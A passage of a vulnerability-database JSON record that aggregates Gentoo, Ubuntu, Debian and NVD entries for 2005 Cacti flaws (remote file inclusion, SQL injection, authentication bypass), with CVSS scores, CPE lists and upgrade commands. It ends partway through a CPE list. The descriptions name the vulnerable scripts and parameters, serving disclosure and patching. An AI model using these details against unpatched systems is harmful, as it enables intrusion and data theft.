with the permissions of the web server. An attacker could exploit these vulnerabilities to bypass authentication or inject SQL queries to gain information from the database. Only systems with register_globals set to \"On\" are affected by the file inclusion and authentication bypass vulnerabilities. Gentoo Linux ships with register_globals set to \"Off\" by default. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Cacti users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/cacti-0.8.6f\"\n\nNote: Users with the vhosts USE flag set should manually use webapp-config to finalize the update.", "cvss3": {}, "published": "2005-06-22T00:00:00", "type": "gentoo", "title": "Cacti: Several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526"], "modified": "2006-05-22T00:00:00", "id": "GLSA-200506-20", "href": "https://security.gentoo.org/glsa/200506-20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T22:04:16", "description": "config.php in Cacti 0.8.6e and earlier allows remote attackers to set the\nno_http_headers switch, then modify session information to gain privileges\nand disable the use of addslashes to conduct SQL injection attacks.", "cvss3": {}, "published": "2005-07-06T00:00:00", "type": "ubuntucve", "title": "CVE-2005-2149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2149"], "modified": "2005-07-06T00:00:00", "id": "UB:CVE-2005-2149", "href": "https://ubuntu.com/security/CVE-2005-2149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-22T22:04:13", "description": "Cacti 0.8.6e and earlier does not perform proper input validation to\nprotect against common attacks, which allows remote attackers to execute\narbitrary commands or SQL by sending a legitimate value in a POST request\nor cookie, then specifying the attack string in the URL, which causes the\nget_request_var function to return the wrong value in the $_REQUEST\nvariable, which is cleansed while the original malicious $_GET value\nremains unmodified, as demonstrated in (1) graph_image.php and (2)\ngraph.php.", "cvss3": {}, "published": "2005-07-06T00:00:00", "type": "ubuntucve", "title": "CVE-2005-2148", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2148"], "modified": "2005-07-06T00:00:00", "id": "UB:CVE-2005-2148", "href": "https://ubuntu.com/security/CVE-2005-2148", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T22:04:15", "description": "SQL injection vulnerability in config_settings.php for Cacti before 0.8.6e\nallows remote attackers to execute arbitrary SQL commands via the id\nparameter.", "cvss3": {}, "published": "2005-06-22T00:00:00", "type": "ubuntucve", "title": "CVE-2005-1525", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1525"], "modified": "2005-06-22T00:00:00", "id": "UB:CVE-2005-1525", "href": "https://ubuntu.com/security/CVE-2005-1525", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T22:04:15", "description": "PHP file inclusion vulnerability in top_graph_header.php in Cacti 0.8.6d\nand possibly earlier versions allows remote attackers to execute arbitrary\nPHP code via the config[library_path] parameter.", "cvss3": {}, "published": "2005-06-22T00:00:00", "type": "ubuntucve", "title": "CVE-2005-1524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524"], "modified": "2005-06-22T00:00:00", "id": "UB:CVE-2005-1524", "href": "https://ubuntu.com/security/CVE-2005-1524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T22:04:15", "description": "PHP remote file inclusion vulnerability in config_settings.php in Cacti\nbefore 0.8.6e allows remote attackers to execute arbitrary PHP code via the\nconfig[include_path] parameter.", "cvss3": {}, "published": "2005-06-22T00:00:00", "type": "ubuntucve", "title": "CVE-2005-1526", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1526"], "modified": "2005-06-22T00:00:00", "id": "UB:CVE-2005-1526", "href": "https://ubuntu.com/security/CVE-2005-1526", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-04-25T07:30:38", "description": "config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks.", "cvss3": {}, "published": "2005-07-06T04:00:00", "type": "debiancve", "title": "CVE-2005-2149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2149"], "modified": "2005-07-06T04:00:00", "id": "DEBIANCVE:CVE-2005-2149", "href": "https://security-tracker.debian.org/tracker/CVE-2005-2149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-25T07:30:38", "description": "Cacti 0.8.6e and earlier does not perform proper input validation to protect against common attacks, which allows remote attackers to execute arbitrary commands or SQL by sending a legitimate value in a POST request or cookie, then specifying the attack string in the URL, which causes the get_request_var function to return the wrong value in the $_REQUEST variable, which is cleansed while the original malicious $_GET value remains unmodified, as demonstrated in (1) graph_image.php and (2) graph.php.", "cvss3": {}, "published": "2005-07-06T04:00:00", "type": "debiancve", "title": "CVE-2005-2148", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2148"], "modified": "2005-07-06T04:00:00", "id": "DEBIANCVE:CVE-2005-2148", "href": "https://security-tracker.debian.org/tracker/CVE-2005-2148", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-25T07:30:37", "description": "SQL injection vulnerability in config_settings.php for Cacti before 0.8.6e allows remote attackers to execute arbitrary SQL commands via the id parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "debiancve", "title": "CVE-2005-1525", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1525"], "modified": "2005-06-22T04:00:00", "id": "DEBIANCVE:CVE-2005-1525", "href": "https://security-tracker.debian.org/tracker/CVE-2005-1525", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-25T07:30:37", "description": "PHP file inclusion vulnerability in top_graph_header.php in Cacti 0.8.6d and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the config[library_path] parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "debiancve", "title": "CVE-2005-1524", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524"], "modified": "2005-06-22T04:00:00", "id": "DEBIANCVE:CVE-2005-1524", "href": "https://security-tracker.debian.org/tracker/CVE-2005-1524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-25T07:30:37", "description": "PHP remote file inclusion vulnerability in config_settings.php in Cacti before 0.8.6e allows remote attackers to execute arbitrary PHP code via the config[include_path] parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "debiancve", "title": "CVE-2005-1526", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1526"], "modified": "2005-06-22T04:00:00", "id": "DEBIANCVE:CVE-2005-1526", "href": "https://security-tracker.debian.org/tracker/CVE-2005-1526", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:10:10", "description": "config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks.", "cvss3": {}, "published": "2005-07-06T04:00:00", "type": "cve", "title": "CVE-2005-2149", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2149"], "modified": "2011-03-08T02:23:00", "cpe": ["cpe:/a:the_cacti_group:cacti:0.8.6", "cpe:/a:the_cacti_group:cacti:0.8.6b", "cpe:/a:the_cacti_group:cacti:0.8.3a", "cpe:/a:the_cacti_group:cacti:0.8.6c", "cpe:/a:the_cacti_group:cacti:0.8.4", "cpe:/a:the_cacti_group:cacti:0.8.2a", "cpe:/a:the_cacti_group:cacti:0.8.5", "cpe:/a:the_cacti_group:cacti:0.8.6a", "cpe:/a:the_cacti_group:cacti:0.8.5a", "cpe:/a:the_cacti_group:cacti:0.8.1", "cpe:/a:the_cacti_group:cacti:0.8.2", "cpe:/a:the_cacti_group:cacti:0.8", "cpe:/a:the_cacti_group:cacti:0.8.6d", "cpe:/a:the_cacti_group:cacti:0.8.3", "cpe:/a:the_cacti_group:cacti:0.8.6e"], "id": "CVE-2005-2149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:the_cacti_group:cacti:0.8.5a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6c:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6b:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6d:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6e:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:10:08", "description": "Cacti 0.8.6e and earlier does not perform proper input validation to protect against common attacks, which allows remote attackers to execute arbitrary commands or SQL by sending a legitimate value in a POST request or cookie, then specifying the attack string in the URL, which causes the get_request_var function to return the wrong value in the $_REQUEST variable, which is cleansed while the original malicious $_GET value remains unmodified, as demonstrated in (1) graph_image.php and (2) graph.php.", "cvss3": {}, "published": "2005-07-06T04:00:00", "type": "cve", "title": "CVE-2005-2148", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2148"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:the_cacti_group:cacti:0.8.6", "cpe:/a:the_cacti_group:cacti:0.8.3a", "cpe:/a:the_cacti_group:cacti:0.8.6b", "cpe:/a:the_cacti_group:cacti:0.8.6c", "cpe:/a:the_cacti_group:cacti:0.8.2a", "cpe:/a:the_cacti_group:cacti:0.8.4", "cpe:/a:the_cacti_group:cacti:0.8.5", "cpe:/a:the_cacti_group:cacti:0.8.6a", "cpe:/a:the_cacti_group:cacti:0.8.5a", "cpe:/a:the_cacti_group:cacti:0.8.1", "cpe:/a:the_cacti_group:cacti:0.8.2", "cpe:/a:the_cacti_group:cacti:0.8", "cpe:/a:the_cacti_group:cacti:0.8.6d", "cpe:/a:the_cacti_group:cacti:0.8.3", "cpe:/a:the_cacti_group:cacti:0.8.6e"], "id": "CVE-2005-2148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2148", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:the_cacti_group:cacti:0.8.5a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6c:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6b:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6d:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6e:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:59:09", "description": "SQL injection vulnerability in config_settings.php for Cacti before 0.8.6e allows remote attackers to execute arbitrary SQL commands via the id parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "cve", "title": "CVE-2005-1525", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1525"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:the_cacti_group:cacti:0.8.2a", "cpe:/a:the_cacti_group:cacti:0.6.1", "cpe:/a:the_cacti_group:cacti:0.6.6", "cpe:/a:the_cacti_group:cacti:0.6.5", "cpe:/a:the_cacti_group:cacti:0.6.2", "cpe:/a:the_cacti_group:cacti:0.5", "cpe:/a:the_cacti_group:cacti:0.6", "cpe:/a:the_cacti_group:cacti:0.8", "cpe:/a:the_cacti_group:cacti:0.8.4", "cpe:/a:the_cacti_group:cacti:0.8.5a", "cpe:/a:the_cacti_group:cacti:0.8.1", "cpe:/a:the_cacti_group:cacti:0.6.7", "cpe:/a:the_cacti_group:cacti:0.8.6d", "cpe:/a:the_cacti_group:cacti:0.8.3", "cpe:/a:the_cacti_group:cacti:0.8.3a", "cpe:/a:the_cacti_group:cacti:0.6.4", "cpe:/a:the_cacti_group:cacti:0.6.8a", "cpe:/a:the_cacti_group:cacti:0.8.2", "cpe:/a:the_cacti_group:cacti:0.6.3", "cpe:/a:the_cacti_group:cacti:0.6.8"], "id": "CVE-2005-1525", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1525", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:the_cacti_group:cacti:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6d:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.5a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8a:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:59:09", "description": "PHP file inclusion vulnerability in top_graph_header.php in Cacti 0.8.6d and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the config[library_path] parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "cve", "title": "CVE-2005-1524", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:the_cacti_group:cacti:0.8.2a", "cpe:/a:the_cacti_group:cacti:0.6.1", "cpe:/a:the_cacti_group:cacti:0.6.6", "cpe:/a:the_cacti_group:cacti:0.6.5", "cpe:/a:the_cacti_group:cacti:0.6.3", "cpe:/a:the_cacti_group:cacti:0.6.2", "cpe:/a:the_cacti_group:cacti:0.5", "cpe:/a:the_cacti_group:cacti:0.6", "cpe:/a:the_cacti_group:cacti:0.8", "cpe:/a:the_cacti_group:cacti:0.8.4", "cpe:/a:the_cacti_group:cacti:0.8.5a", "cpe:/a:the_cacti_group:cacti:0.8.1", "cpe:/a:the_cacti_group:cacti:0.6.7", "cpe:/a:the_cacti_group:cacti:0.8.6d", "cpe:/a:the_cacti_group:cacti:0.8.3", "cpe:/a:the_cacti_group:cacti:0.6.4", "cpe:/a:the_cacti_group:cacti:0.6.8a", "cpe:/a:the_cacti_group:cacti:0.8.2", "cpe:/a:the_cacti_group:cacti:0.8.3a", "cpe:/a:the_cacti_group:cacti:0.6.8"], "id": "CVE-2005-1524", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1524", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:the_cacti_group:cacti:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6d:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.5a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8a:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:59:11", "description": "PHP remote file inclusion vulnerability in config_settings.php in Cacti before 0.8.6e allows remote attackers to execute arbitrary PHP code via the config[include_path] parameter.", "cvss3": {}, "published": "2005-06-22T04:00:00", "type": "cve", "title": "CVE-2005-1526", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1526"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:the_cacti_group:cacti:0.8.2a", "cpe:/a:the_cacti_group:cacti:0.6.1", "cpe:/a:the_cacti_group:cacti:0.6.6", "cpe:/a:the_cacti_group:cacti:0.6.5", "cpe:/a:the_cacti_group:cacti:0.6.3", "cpe:/a:the_cacti_group:cacti:0.6.2", "cpe:/a:the_cacti_group:cacti:0.5", "cpe:/a:the_cacti_group:cacti:0.6", "cpe:/a:the_cacti_group:cacti:0.8", "cpe:/a:the_cacti_group:cacti:0.8.4", "cpe:/a:the_cacti_group:cacti:0.8.5a", "cpe:/a:the_cacti_group:cacti:0.8.1", "cpe:/a:the_cacti_group:cacti:0.6.7", "cpe:/a:the_cacti_group:cacti:0.8.6d", "cpe:/a:the_cacti_group:cacti:0.8.3", "cpe:/a:the_cacti_group:cacti:0.6.4", "cpe:/a:the_cacti_group:cacti:0.6.8a", "cpe:/a:the_cacti_group:cacti:0.8.2", "cpe:/a:the_cacti_group:cacti:0.8.3a", "cpe:/a:the_cacti_group:cacti:0.6.8"], "id": "CVE-2005-1526", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1526", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:the_cacti_group:cacti:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.1:*:*:*:*:*:*:*", 